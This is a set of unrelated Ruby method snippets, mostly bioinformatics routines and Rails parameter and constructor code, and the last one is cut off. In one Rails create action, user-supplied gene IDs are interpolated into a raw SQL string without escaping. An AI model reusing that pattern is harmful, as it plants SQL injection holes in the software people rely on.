"def initialize(line, qfasta_file, tfasta_file)\n a = line.split\n @qid = a[0]\n @qstart = a[1].to_i\n @qend = a[2].to_i\n @qstrand = a[3]\n @tid = a[4]\n @tstart = a[5].to_i\n @tend = a[6].to_i\n @tstrand = a[7]\n @score = a[8]\n @cigar = a[9..-1].each_slice(2).to_a.map{|a, b| [a, b.to_i]}\n\n @qfasta_file = qfasta_file\n @tfasta_file = tfasta_file\n end",
"def initialize\n @max_buckets = 8\n # TODO: some gradient descent to choose this number\n @min_support = 0.07\n @num_top_grams = 250\n end",
"def studentannotation_params\n params.require(:studentannotation).permit(:times, :comment, :statusannotation_id, :typeannotation_id, :user_id, :user_id)\n end",
"def init_params(learning_rate=0.1,f_regulator=0.015, f_amount=2, f_default=0.1,max_iterations=100)\r\n change_param(@learning_rate_str,learning_rate)\r\n change_param(@f_regulator_str,f_regulator)\r\n change_param(@f_amoun_str,f_amount)\r\n change_param(@f_default_str,f_default)\r\n change_param(@max_iterations_str,max_iterations)\r\n change_param(@global_predictor_str,0.0)\r\n set_factors_amount(f_amount)\r\n end",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts 
[\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def before_perform\n \n @basename = File.join(job.job_dir, job.jobid)\n @seqfile = @basename+\".in\"\n params_to_file(@seqfile, 'sequence_input', 'sequence_file')\n @commands = []\n @informat = params['informat'] ? params['informat'] : 'fas'\n reformat(@informat, \"fas\", @seqfile)\n @informat = \"fas\"\n\n @maxpsiblastit = params['maxpsiblastit']\n @maxhhblitsit = params['maxhhblitsit']\n @ss_scoring = \"-ssm \" + params[\"ss_scoring\"]\n @ptot = \"-T \" + params[\"ptot\"]\n @pself = \"-P \" + params[\"pself\"]\n @mergerounds = \"-mrgr \" + params[\"mergerounds\"]\n @mact = \"-mapt1 \" + params[\"mact\"] + \" -mapt2 \" + params[\"mact\"] + \" -mapt3 \" + params[\"mact\"]\n @domm = params[\"domm\"].nil? ? \"-domm 0\" : \"\" \n \n @maxlines = \"20\"\n @v = 1\n \n end",
"def align_global(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = @@d * i\n end\n for j in 0..y\n tab[0][j] = @@d * j\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert].max\n end\n end\n\n @table = tab\n value = tab[x][y]\n EvaluatedProtein.new(protein, value)\n end",
"def annotate_samples\n # hash to connect metadata\n exp_hash = create_metadata_hash(@exp_metadata, 0) # { expid => [metadata] }\n bs_hash = create_metadata_hash(@bs_metadata, 0) # { biosampleid => [metadata] }\n srs_hash = create_metadata_hash(@bs_metadata, 1) # { sampleid => [metadata] }\n date_hash = received_date_by_experiment # { expid => date_received }\n\n annotated = Parallel.map(open(@samples_fpath).readlines.drop(1), :in_threads => @@nop) do |line|\n data = line.chomp.split(\"\\t\")\n sample_md = bs_hash[data[0]] || srs_hash[data[0]]\n sample_info = if sample_md\n coverage = if sample_md[3] != \"NA\"\n data[7].to_f / sample_md[3].to_f * 1_000_000\n else\n \"NA\"\n end\n [\n sample_md,\n coverage,\n ]\n else\n \"NA\\tNA\\tNA\\tNA\" # secondary sample id, taxon id, taxonomic name, coverage\n end\n [\n data,\n sample_info,\n exp_hash[data[1]],\n date_hash[data[1]],\n ].flatten.join(\"\\t\")\n end\n open(output_fpath(\"quanto.annotated.tsv\"), 'w'){|f| f.puts([annotated_header.join(\"\\t\"), annotated]) }\n end",
"def parse_alignment_options(options = {})\n return unless options[:alignment]\n\n CellAlignment.new options[:alignment]\n end",
"def initialize (gene_id, gene_name, mut_phen_description) #I initialize the three properties of the class\n @gene_id = gene_id\n @gene_name = gene_name\n @mut_phen_description = mut_phen_description\n @gene_linkings = [] # I prefer this attribute as array (one gene can be linked with more of one other gene)\n end",
"def create\n @cla = Cla.new(cla_params)\n \n if current_user and params[:cla][:annot_id]\n\n orcid_user = current_user.orcid_user\n \n #complement attributes\n @annot = Annot.where(:id => params[:cla][:annot_id]).first\n list_cats = Basic.safe_parse_json(@annot.list_cat_json, [])\n @cat_idx = list_cats.index(@cla.cat)\n\n if @annot\n @cla.project_id = @annot.project_id\n @project = @annot.project\n @version =@project.version\n @h_env = Basic.safe_parse_json(@version.env_json, {})\n @annot_cell_set = AnnotCellSet.where(:annot_id => @annot.id, :cat_idx => @cat_idx).first\n @cell_set = CellSet.where(:id => @annot_cell_set.cell_set_id).first\n @all_annot_cell_sets = AnnotCellSet.where(:annot_id => @annot.id).all \n end\n @cla.user_id = (current_user) ? current_user.id : nil\n @cla.orcid_user_id = (ou = current_user.orcid_user) ? ou.id : nil\n @cla.cla_source_id = 1\n \n tmp_gene_ids = []\n if @h_env\n # tmp_gene_ids = Basic.@cla.genes.split(\",\").map{|e| e.}\n tmp_gene_ids = Basic.sql_query2(:asap_data, @h_env['asap_data_db_version'], 'genes', '', 'id', \"organism_id = #{@project.organism_id} and ensembl_id in (#{@cla.up_gene_ids.split(\",\").map{|e| \"'#{e}'\"}.join(\",\")})\")\n end\n @cla.up_gene_ids = tmp_gene_ids.map{|g| g.id}.uniq.join(\",\")\n \n tmp_gene_ids = []\n if @h_env\n # tmp_gene_ids = Basic.@cla.genes.split(\",\").map{|e| e.} \n tmp_gene_ids = Basic.sql_query2(:asap_data, @h_env['asap_data_db_version'], 'genes', '', 'id', \"organism_id = #{@project.organism_id} and ensembl_id in (#{@cla.down_gene_ids.split(\",\").map{|e| \"'#{e}'\"}.join(\",\")})\")\n end\n @cla.down_gene_ids = tmp_gene_ids.map{|g| g.id}.uniq.join(\",\")\n\n ## reorder ids\n up_gene_ids = (@cla.up_gene_ids) ? @cla.up_gene_ids.split(\",\") : []\n down_gene_ids = (@cla.down_gene_ids) ? @cla.down_gene_ids.split(\",\") : []\n sorted_up_gene_ids = (@cla.up_gene_ids) ? @cla.up_gene_ids.split(\",\").sort : []\n sorted_down_gene_ids = (@cla.down_gene_ids) ? @cla.down_gene_ids.split(\",\").sort : []\n \n h_gene_ids = {}\n gene_ids = up_gene_ids | down_gene_ids\n gene_ids.map{|e| h_gene_ids[e] = 1}\n\n cot_ids = (@cla.cell_ontology_term_ids) ? @cla.cell_ontology_term_ids.split(\",\") : []\n sorted_cot_ids = (@cla.cell_ontology_term_ids) ? @cla.cell_ontology_term_ids.split(\",\").sort : []\n \n h_cot_ids = {}\n cot_ids.map{|e| h_cot_ids[e] = 1}\n \n @cla.cell_ontology_term_ids = (cot_ids.size > 0) ? cot_ids.join(\",\") : \"\"\n @cla.sorted_cell_ontology_term_ids = (sorted_cot_ids.size > 0) ? sorted_cot_ids.join(\",\") : \"\"\n @cla.up_gene_ids = (up_gene_ids.size > 0) ? up_gene_ids.join(\",\") : \"\"\n @cla.down_gene_ids = (down_gene_ids.size > 0) ? down_gene_ids.join(\",\") : \"\"\n @cla.up_gene_ids = (sorted_up_gene_ids.size > 0) ? sorted_up_gene_ids.join(\",\") : \"\"\n @cla.down_gene_ids = (sorted_down_gene_ids.size > 0) ? 
sorted_down_gene_ids.join(\",\") : \"\"\n\n @cla.cell_set_id = @annot_cell_set.cell_set_id\n\n @errors = []\n \n #####check if cla already exists\n #h_cla = @cla.attributes\n #h_cla.delete(\"user_id\")\n if @cla.cell_ontology_term_ids != ''\n h_cla = {\n# :annot_id => @annot.id,\n :cell_set_id => @annot_cell_set.cell_set_id,\n # :cat => @cla.cat,\n # :genes => @cla.genes,\n :cell_ontology_term_ids => @cla.cell_ontology_term_ids\n }\n existing_cla = Cla.where(h_cla).first\n \n if existing_cla \n @errors.push(\"Annotation ##{existing_cla.num} in group \" + existing_cla.cat + \" has the same ontology terms.\")\n end\n\n end\n # if !existing_cla\n if @cla.name != ''\n h_cla = {\n# :annot_id => @annot.id,\n :cell_set_id => @annot_cell_set.cell_set_id,\n # :cat => @cla.cat,\n :name => @cla.name,\n :cell_ontology_term_ids => [\"\", nil]\n }\n existing_cla = Cla.where(h_cla).first\n if existing_cla\n @errors.push(\"Annotation ##{existing_cla.num} in group \" + existing_cla.cat + \" has the same name.\")\n end\n end\n # end\n \n # if ! existing_cla and ![\"\", nil].include? @cla.genes\n if @cla.up_gene_ids != '' or @cla.down_gene_ids != ''\n h_cla = {\n# :annot_id => @annot.id,\n :cell_set_id => @annot_cell_set.cell_set_id,\n # :cat => @cla.cat,\n :sorted_up_gene_ids => @cla.sorted_up_gene_ids,\n :sorted_down_gene_ids => @cla.sorted_down_gene_ids\n }\n existing_cla = Cla.where(h_cla).first\n if existing_cla\n @errors.push(\"Annotation ##{existing_cla.num} in group \" + existing_cla.cat + \" has the same gene lists (up and down).\")\n end\n end\n # end\n \n h_clas = {\n :by_cot_id => {},\n :by_gene_id => {}\n }\n all_clas = Cla.where(\n :cell_set_id => @cell_set.id #@all_annot_cell_sets.map{|e| e.cell_set_id}\n #:annot_id => @annot.id, :cat => @cla.cat\n ).all\n @cla.num = (all_clas.size > 0) ? (all_clas.map{|e| e.num}.sort.last+1) : 1\n \n @h_all_clas = {}\n all_clas.each do |cla|\n @h_all_clas[cla.id] = cla\n # tmp_up_gene_ids = (cla.up_gene_ids) ? cla.up_gene_ids.split(\",\") : []\n # tmp_cot_ids = (cla.cell_ontology_term_ids) ? cla.cell_ontology_term_ids.split(\",\") : []\n # tmp_up_gene_ids.map{|e| h_clas[:by_gene_id][e] ||= []; h_clas[:by_gene_id][e].push cla.id}\n # tmp_cot_ids.map{|e| h_clas[:by_cot_id][e] ||= []; h_clas[:by_cot_id][e].push cla.id} \n end\n \n @approaching_clas = {:cot_ids => [], :up_gene_ids => [], :down_gene_ids => []}\n @max_common = {:up_gene_ids => 0, :down_gene_ids => 0, :cot_ids => 0}\n if @errors.size == 0\n all_clas.each do |cla|\n if cla.sorted_up_gene_ids != @cla.sorted_up_gene_ids\n tmp_gene_ids = (cla.up_gene_ids and cla.up_gene_ids != '') ? cla.up_gene_ids.split(\",\") : []\n nber_common_gene_ids = (tmp_gene_ids.size >0) ? tmp_gene_ids.map{|e| h_gene_ids[e] || 0}.sum : 0\n if nber_common_gene_ids > @max_common[:up_gene_ids]\n @max_common[:up_gene_ids] = nber_common_gene_ids\n @approaching_clas[:up_gene_ids] = [cla.id]\n elsif nber_common_gene_ids == @max_common[:up_gene_ids]\n @approaching_clas[:up_gene_ids].push cla.id\n end\n end\n if cla.sorted_down_gene_ids != @cla.sorted_down_gene_ids\n tmp_gene_ids = (cla.down_gene_ids and cla.down_gene_ids != '') ? cla.down_gene_ids.split(\",\") : []\n nber_common_gene_ids = (tmp_gene_ids.size >0) ? 
tmp_gene_ids.map{|e| h_gene_ids[e] || 0}.sum : 0\n if nber_common_gene_ids > @max_common[:down_gene_ids]\n @max_common[:down_gene_ids] = nber_common_gene_ids\n @approaching_clas[:down_gene_ids] = [cla.id]\n elsif nber_common_gene_ids == @max_common[:down_gene_ids]\n @approaching_clas[:down_gene_ids].push cla.id\n end\n end\n \n if cla.sorted_cell_ontology_term_ids != @cla.sorted_cell_ontology_term_ids\n tmp_cot_ids = (cla.cell_ontology_term_ids and cla.cell_ontology_term_ids != '') ? cla.cell_ontology_term_ids.split(\",\") : []\n nber_common_cots = (tmp_cot_ids.size > 0) ? tmp_cot_ids.map{|e| h_cot_ids[e] || 0}.sum : 0\n if nber_common_cots > @max_common[:cot_ids]\n @max_common[:cot_ids] = nber_common_cots\n @approaching_clas[:cot_ids] = [cla.id]\n elsif nber_common_cots == @max_common[:cot_ids]\n @approaching_clas[:cot_ids].push cla.id\n end\n end\n end\n end\n \n @approaching_clas.each_key do |k|\n @approaching_clas[k].uniq!\n end\n \n # @cla.user_name = current_user.displayed_name\n @cla.user_id = current_user.id\n @cla.orcid_user_id = (orcid_user) ? orcid_user.id : nil\n \n respond_to do |format|\n if ((@max_common[:down_gene_ids] == 0 and @max_common[:up_gene_ids] == 0 and @max_common[:cot_ids] == 0) or params[:confirm] == '1') and @errors.size == 0 and @annot and @cla.save \n\n ## add vote\n cla_vote = ClaVote.where(:cla_id => @cla.id, :user_id => current_user.id).first\n \n h_vote = {\n :cla_id => @cla.id,\n :cla_source_id => 1,\n :agree => true,\n :user_id => current_user.id,\n :user_name => current_user.displayed_name,\n :orcid_user_id => (orcid_user) ? orcid_user.id : nil\n }\n \n logger.debug(\"add_cla_vote\")\n if cla_vote\n cla_vote.update_attributes(h_vote)\n else\n cla_vote = ClaVote.new(h_vote)\n cla_vote.save\n end\n\n @cla.update_attributes({:nber_agree => 1})\n \n ## init h_cat_info\n h_cat_info = Basic.safe_parse_json(@annot.cat_info_json, {})\n\n if !h_cat_info[\"nber_clas\"]\n h_cat_info = {\"nber_clas\" => [], \"selected_cla_ids\" => []}\n list_cats.each_index do |cat_i|\n h_cat_info[\"nber_clas\"][cat_i] = 0\n h_cat_info[\"selected_cla_ids\"][cat_i] = \"\"\n end\n h_cat_info[\"nber_clas\"][@cat_idx] = all_clas.size + 1\n end\n \n all_clas = Cla.where(:cell_set_id => @cla.cell_set_id\n #:annot_id => @annot.id, :cat => @cla.cat\n ).all\n selected_cla = all_clas.sort{|a, b| a.nber_agree - a.nber_disagree <=> b.nber_agree - b.nber_disagree}.last\n \n h_cat_info[\"selected_cla_ids\"][@cat_idx] = selected_cla.id if selected_cla\n @annot.update_attributes({:cat_info_json => h_cat_info.to_json})\n\n ## replaced by cell_set associated info\n @cell_set.update_attributes({:nber_clas => all_clas.size, :cla_id => selected_cla.id})\n \n # format.html { redirect_to @cla, notice: 'Cla was successfully created.' }\n format.html{ render :partial => 'create'}\n format.json { render :show, status: :created, location: @cla }\n else\n format.html { render :partial => 'create_error_or_warning' }\n format.json { render json: @cla.errors, status: :unprocessable_entity }\n end\n end\n end\n end",
"def initialize\n @annotation_schema = nil\n @schema_version = nil\n @sources = []\n @dictionaries = []\n\n @source_index = {}\n @div_index = {}\n @sentence_index = {}\n @token_index = {}\n end",
"def initialize(nation, megatonnage: 400, defcon: 5, sufddir: 0.0, inddir: 0.0,\n\t\t\t\t\t\t\t sacpop: 0, rad_level: 0, em_immunity: true,\n\t\t\t\t\t\t\t population: 300_000_000, accuracy: 0, score: 0, is_player: false)\n\n\t\t\t@nation = nation.to_s.upcase\n\t\t\t@sufddir = sufddir #suffering of death, destruction, and incapacitation of response\n\t\t\t@inddir = inddir #infliction of death, destruction, and incapacitation of response\n\t\t\t@defcon = defcon\n\t\t\t@sacpop = sacpop # strikes against civilian populations\n\t\t\t@megatonnage = megatonnage # distrubtion of megatonnage determined by mean-value theorem of integrals\n\t\t\t@rad_level = rad_level\n\t\t\t@em_immunity = em_immunity\n\t\t\t@population = population\n\t\t\t@accuracy = accuracy\n\t\t\t@score = score\n\t\t\t@targets_hit = Hash.new(0)\n\t\t\t@is_player = is_player\n\t\tend",
"def initializeDefaultParams()\n @fcName = nil # Flowcell name\n @baseCallsDir = nil # BaseCalls dir of the flowcell\n @useBasesMask = nil # Custom value to provide to BCL->FastQ convertor\n @sampleSheet = nil # Path to SampleSheet.csv\n yamlConfigFile = File.dirname(File.expand_path(File.dirname(__FILE__))) +\n \"/config/config_params.yml\" \n @configReader = YAML.load_file(yamlConfigFile)\n @queue = \"high\" # The processing queue on the cluster\n end",
"def taxon_params\n params.require(:taxon).permit(:common_name, :scientific_name, :ncbi_taxid, :user_id, :notes, :aliases, :restricted,\n genome_assemblies_attributes: [:id, :name, :alias, :accession, :release_date, :_destroy,\n genome_annotations_attributes: [:id, :name, :link, :index_link, :release_date,\n :_destroy]])\n end",
"def goannotation_params\n params.require(:goannotation).permit(:annotate)\n end",
"def initialize(alignments, widths = nil)\n @alignments = alignments\n @widths = widths\n end",
"def set_defaults\n self.annual_inflation_rate ||= 1.1\n self.pcnt_residual_value ||= 0\n self.condition_rollup_weight ||= 0\n end",
"def a3g_hypermut_seq_hash(seq_hash)\n #mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n #total G->A mutations at apobec3g/f positions.\n total = 0\n\n #make specimen consensus\n ref = consensus_without_alignment(seq_hash.values)\n\n #obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n seq_hash.each do |k,v|\n a = 0 #muts\n b = 0 #potential mut sites\n c = 0 #control muts\n d = 0 #potenrial controls\n mut.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = k + \",\" + a.to_s + \",\" + b.to_s + \",\" + c.to_s + \",\" + d.to_s + \",\" + rr.round(2).to_s + \",\" + perc.to_s\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if seq_hash.size > 20\n rate = total.to_f/(seq_hash.size)\n\n count_mut = count(mut_hash.values)\n maxi_count = count_mut.values.max\n\n poisson_hash = poisson_distribution(rate,maxi_count)\n\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = seq_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = {}\n hm_hash.keys.each do |k|\n hm_seq_hash[k] = seq_hash[k]\n end\n return [hm_seq_hash,hm_hash]\nend",
"def initialize (params = {})\n @parent1 = params.fetch(:Parent1, 'parent 1 unknown')\n @parent2 = params.fetch(:Parent2, 'parent 2 unknown')\n @f2_wild = params.fetch(:F2_Wild, 'f2 wild unknown')\n @f2_p1 = params.fetch(:F2_P1, 'f2-p1 unknown')\n @f2_p2 = params.fetch(:F2_P2, 'f2-p2 unknown')\n @f2_p1p2 = params.fetch(:F2_P1P2, 'f2-p1p2 unknown')\n #I call the method linked genes, to check if the two genes represented in this object are linked\n linked_genes @parent1, @parent2, @f2_wild, @f2_p1, @f2_p2, @f2_p1p2\n @@hybridcross_array << self #Each time we add an object, it goes into gene_array\n end",
"def sequence_params\n params.require(:sequence).permit(:sample_id, :date_seq, :gene, :start, :end, :length, :sequence, :insertion, :subtype_code, :codon_start, :translation, :clonal, :provirus, :notes, :operator_id)\n end",
"def initialize (params = {})\n \n @prot_id = params.fetch(:prot_id, \"XXXXXX\") \n @intact_id = params.fetch(:intact_id, nil)\n @network = params.fetch(:network, nil)\n \n @@total_protein_objects[prot_id] = self\n \n if intact_id\n @@total_protwithintact_objects[intact_id] = self\n end \n \n end",
"def init_custom_fields\n @growth_rate = [0.0] * 8\n @msp = 0\n @capacities = []\n end",
"def initialize (params = {})\n \n @gene_id = params.fetch(:gene_id, 'Unknown_id')\n @accession = []\n @go = {}\n @kegg = []\n @intact = Array.new\n @kegg_pathway = {}\n \n @@my_genes << self #store the objects in the array\n \n end",
"def before_perform\n init\n\n @inputformat = params['informat'] ? params['informat'] : \"\"\n\n @colors = ['red', 'orange', 'yellow', 'darkgreen', 'green', 'lightblue', 'blue', 'violet', 'pink']\n #@colors = ['red', 'blue', 'yellow', 'darkgreen', 'pink', 'lightblue', 'orange', 'green', 'pink']\n\n @inputSequences = Array.new\n @inputTags = Array.new\n #@db_path = File.join(GCVIEW, 'tool.db')\n\n @db_path = File.join(DATABASES, 'gcview', 'tool.db')\n @show_number = params['show_number'] ? params['show_number'] : \"5\"\n @show_type = params['show_type'] ? params['show_type'] : \"genes\"\n @cut_off = params['evalue_cutoff'] ? params['evalue_cutoff'] : \"1e-3\"\n\n @input = @basename+\".in\"\n params_to_file(@input, 'sequence_input', 'sequence_file')\n @input_job = @basename+\".jin\"\n params_to_file(@input_job, 'jobid_input')\n #logger.debug \"Params seq inp: #{params.inspect}\"\n\n @input_jobid = false\n @input_sequence = false\n \n @outfile = @basename\n\n @configfile = @basename+\".conf\"\n\n @mainlog = job.statuslog_path\n\n @tmparray = Array.new\n @jobtype = Array.new\n @formerjob = ''\n \n if (params['sequence_input']!=nil || params['sequence_file']!=nil)\n if (@inputformat=='fas')\n check_fasta\n end\n\n if (@inputformat=='gi')\n check_GI\n end\n @input_sequence=true\n end\n\n if (params['jobid_input']!=nil)\n parse_sequencefile(@input_job)\n\n for i in 0..@inputSequences.length-1\n @inputSequences[i]=@inputSequences[i].gsub(/\\s+$/, '')\n end\n @input_jobid=true\n end\n\n if (@cut_off =~ /^e.*$/)\n @cut_off = \"1\" + @cut_off\n end\n\n\n\n # Angabe, wie viele Inputsequences bzw. JobIDs gegeben sind\n @inputSequences_length = @inputSequences.length\n logger.debug \"InputSequences Length: #{@inputSequences_length}\"\n\n logger.debug \"Input_Sequences (before_perform): #{@inputSequences.length} \"\n logger.debug \"tmparray (before_perform): #{@tmparray.length}\"\n logger.debug \"jobtype (before_perform): #{@jobtype.length}\"\n\n if (@inputSequences_length == 0)\n logfile = File.open(job.statuslog_path, \"w\")\n logfile.write(\"No valid input found -- Exiting...\")\n logfile.close \n self.status = STATUS_ERROR\n self.save!\n job.update_status\n raise \"No valid input found\" # just to be sure\n else\n write_configfile\n end\n\n #Check input format\n\n ### -> muss noch erledigt werden: jetzt allerdings Annahme, dass nur IDs eingegeben werden\n\n #if JobID: JobIDS getrennt ins Array @inputIDs speichern; Array-Laenge bestimmen\n\n #if (@inputformat=='jid')\n # 1) Testen, ob Jobs existieren und ob es sich um einen PsiblastJob handelt, dann in Array\n # einfuegen\n #-> erledigt: parse_sequencefile\n\n # 2) Arraylaenge bestimmen\n # @inputSequences_length = @inputSequences.length -> erledigt: in before_perform\n #if FASTA: bei Input einer Fasta-Sequenz gibt es nur ein Inputfile -> Array hat nur die Länge 1\n #else\n #Wird noch hinzugefuegt, allerdings erst nachdem der jid-Teil fertig ist ... .\n #end\n\n\n\n # Inputfiles aus den Psiblast-Tmp-Verzeichnissen holen + ins neue tmp-Verzeichnis speichern\n # -> für Anzahl der Psiblast-Jobs, die verwendet werden ... 
.\n #for (i=0; i<@inputSequences_length; i++)\n\n\n\n # 1) Input Format checken:\n # a) JobIDs: - IDs trennen\n # - Anzahl (nicht mehr als 10)\n # - IDs in ein Array schreiben und schauen, ob es diese ID überhaupt noch gibt\n # (Mysql Table zu JobID die MysqlID suchen, dann mit MysqlID im tmp-Verz.\n # schauen -> aehnlich Jobscard am li Rand)\n # -> Anzahl der Inputfiles richtet sich nach der Anzahl der JobIDs\n # b) FASTA: - Psiblast laufen lassen (ein Inputfile ...)\n # c) in Array abspeichern\n # 2) Arraylaenge der Inputfiles abspeichern\n end",
"def initialize(number_of_inputs, params = {})\n super(number_of_inputs)\n\n @learning_rate = params[:learning_rate] || 1\n @threshold = params[:threshold] || 2\n @max_attempts = 1000\n add_bias(1)\n end",
"def initialize(id, centerMax, standardDeviations)\n g = GaussianGenerator.new\n @id = id\n @ppm = centerMax * rand\n @params = standardDeviations.map {|sd| g.next(0,sd)}\n end",
"def setup_propositions(params)\n self.params = {\n sigla: params[:sigla], numero: params[:numero], ano: params[:ano], datApresentacaoIni: params[:datApresentacaoIni],\n generoAutor: params[:generoAutor], datApresentacaoFim: params[:datApresentacaoFim], parteNomeAutor: params[:parteNomeAutor],\n idTipoAutor: params[:idTipoAutor], siglaUFAutor: params[:siglaUFAutor], codEstado: params[:codEstado],\n codOrgaoEstado: params[:codOrgaoEstado], emTramitacao: params[:emTramitacao], siglaPartidoAutor: params[:siglaPartidoAutor]\n }\n end",
"def initialize\n @amplitude = {}\n @mixpanel = {}\n @appmetrica = {}\n @appsflyer = {}\n end",
"def initialize(options = {})\n super\n @spamassassin_threshold = options[:spamassassin_threshold] || 5\n end",
"def post_initialize(params)\n @planner_color_1 = params[:planner_color_1] || ::DotGrid::Color.new(\"CCCCCC\")\n @planner_color_2 = params[:planner_color_2] || ::DotGrid::Color.new(\"0099FF\")\n @grid_color = params[:grid_color] || ::DotGrid::Color.new(\"B3B3B3\")\n @dot_weight = params[:dot_weight] || 1.5\n @spacing = params[:spacing] ? params[:spacing].mm : 5.mm\n add_pattern(::DotGrid::Pattern::SquareGrid.new(params.merge!(:bounds => square_grid_bounds, grid_color: @planner_color_1)))\n add_pattern(::DotGrid::Pattern::DotGrid.new(params.merge!(:bounds => dot_grid_bounds)))\n end",
"def default_operation_params\n {\n tr_96_384_program: '96_to_384_sample',\n tr_96_384_robot: Biomek::MODEL\n }\n end",
"def before_perform \n # Init file vars \n\t @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".fasta\"\n @outfile = @basename+\".csblast\"\n \n # Save either the pasted Sequence from frontend or uploaded Sequence File to in file\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n # Reformat the input sequence to match fasta format (perl script call)\n reformat(@informat, \"fas\", @infile)\n # necessary for resubmitting domains via slider\n\t File.copy(@infile, @basename+\".in\")\t\n \n # init cmd container\n @commands = []\n\n # init frontend params\n @inputmode = params['inputmode']\n @expect = params['evalue']\n @filter = params['filter'] ? 'T' : 'F'\n @mat_param = params['matrix']\n @other_advanced = params['otheradvanced']\n @descriptions = params['descr']\n @alignments = params['alignments']\n @db_path = params['std_dbs'].nil? ? \"\" : params['std_dbs'].join(' ')\n @db_path = params['user_dbs'].nil? ? @db_path : @db_path + ' ' + params['user_dbs'].join(' ')\n \n 